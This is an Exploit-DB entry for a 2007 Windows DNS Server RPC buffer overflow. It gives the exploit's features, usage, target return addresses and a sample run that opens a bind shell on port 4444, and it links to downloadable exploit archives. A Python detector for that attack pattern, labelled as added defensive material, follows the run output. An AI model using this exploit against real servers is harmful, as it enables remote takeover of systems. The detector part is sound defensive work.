Microsoft Windows - DNS RPC Remote Buffer Overflow (2)

EDB-ID: 3746
Platform: Windows
Date: 2007-04-18


  Exploit v2 features:
  - Targets remote port 445 by default (requires auth)
  - Manual target for the dynamic TCP port (without auth)
  - Automatic search for the dynamic DNS RPC port
  - Local and remote OS fingerprinting (auto target)
  - Windows 2000 Server and Windows 2003 Server (Spanish) supported by default
  - Fixed bug with the Windows 2003 shellcode
  - Universal local exploit for Win2k (automatic search for opcodes)
  - Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)
  - Added targets for remote Win2k English and Italian (not tested, found with the Metasploit opcode database; please report your own)
  - Microsoft RPC API used ( who cares? :p )


D:\Programación\DNSTEST>dnstest
 --------------------------------------------------------------
 Microsoft Dns Server local & remote RPC Exploit code
 Exploit code by Andres Tarasco & Mario Ballano
 Tested against Windows 2000 server SP4 and Windows 2003 SP2
 --------------------------------------------------------------

 Usage:   dnstest -h 127.0.0.1 (Universal local exploit)
          dnstest -h host [-t id] [-p port]
 Targets:
      0 (0x30270b0b) - Win2k3 server SP2 Universal - (default for win2k3)
      1 (0x79467ef8) - Win2k  server SP4 Spanish -   (default for win2k )
      2 (0x7c4fedbb) - Win2k  server SP4 English
      3 (0x7963edbb) - Win2k  server SP4 Italian
      4 (0x41414141) - Windows all Denial of Service


D:\Programación\DNSTEST>dnstest.exe -h 192.168.1.2
 --------------------------------------------------------------
 Microsoft Dns Server local & remote RPC Exploit code
 Exploit code by Andres Tarasco & Mario Ballano
 Tested against Windows 2000 server SP4 and Windows 2003 SP2
 --------------------------------------------------------------

[+] Trying to fingerprint target.. (05.02)
[+] Remote Host identified as Windows 2003
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp: 192.168.1.2
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105]
[+] Dynamic DNS rpc port found (1105)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105]
[+] RpcBindingFromStringBinding success
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444
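The session above shows the sequence a defender can key on: a lookup of the DNS server RPC interface UUID (50abc2a4-574d-40b3-9d66-ee4fd5fba076) on the target, a bind to the dynamic port it was mapped to, and shortly afterwards a connection to the bind shell on TCP 4444. The detector below is an added example, not code from the original exploit or its authors; it correlates those two events per source/destination pair over constructed connection-log lines. The log format, the 60-second window and the 4444 bind port are assumptions, and the UUID alone is not treated as an alert because dnscmd and the DNS MMC snap-in use the same interface legitimately.

```python
import re

# DNS server RPC interface UUID, as printed in the exploit's output above.
DNS_RPC_UUID = "50abc2a4-574d-40b3-9d66-ee4fd5fba076"

# Constructed sample log (not from the page): "HH:MM:SS src dst:port uuid-or-dash".
SAMPLE_LOG = """\
10:00:01 192.168.1.50 192.168.1.2:135 -
10:00:02 192.168.1.50 192.168.1.2:1105 50abc2a4-574d-40b3-9d66-ee4fd5fba076
10:00:03 192.168.1.50 192.168.1.2:4444 -
10:05:00 192.168.1.10 192.168.1.2:1105 50abc2a4-574d-40b3-9d66-ee4fd5fba076
10:06:00 192.168.1.77 192.168.1.2:4444 -
"""

LINE_RE = re.compile(r"^(\d\d):(\d\d):(\d\d) (\S+) (\S+):(\d+) (\S+)$")


def parse_line(line):
    """Parse one assumed-format log line into a dict, or None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    h, mi, s, src, dst, port, uuid = m.groups()
    return {"t": int(h) * 3600 + int(mi) * 60 + int(s), "src": src,
            "dst": dst, "port": int(port), "uuid": uuid.lower()}


def find_suspects(log_text, bind_port=4444, window=60):
    """Alert when a host binds the DNS RPC interface on a server and then
    connects to the assumed bind-shell port on the same server within `window`
    seconds. Either event on its own is ignored (admin tools use the UUID;
    port 4444 alone could be anything)."""
    last_rpc = {}   # (src, dst) -> time of most recent DNS RPC interface use
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["src"], rec["dst"])
        if rec["uuid"] == DNS_RPC_UUID:
            last_rpc[key] = rec["t"]
        elif rec["port"] == bind_port and key in last_rpc \
                and rec["t"] - last_rpc[key] <= window:
            alerts.append({"src": rec["src"], "dst": rec["dst"],
                           "rpc_at": last_rpc[key], "shell_at": rec["t"]})
    return alerts


if __name__ == "__main__":
    for a in find_suspects(SAMPLE_LOG):
        print("possible DNS RPC exploitation: %(src)s -> %(dst)s" % a)
```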


also available at

http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip
http://www.48bits.com/exploits/dnsxpl.v2.1.zip
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3746.zip (04172007-dnsxpl.v2.1.zip)

# milw0rm.com [2007-04-18]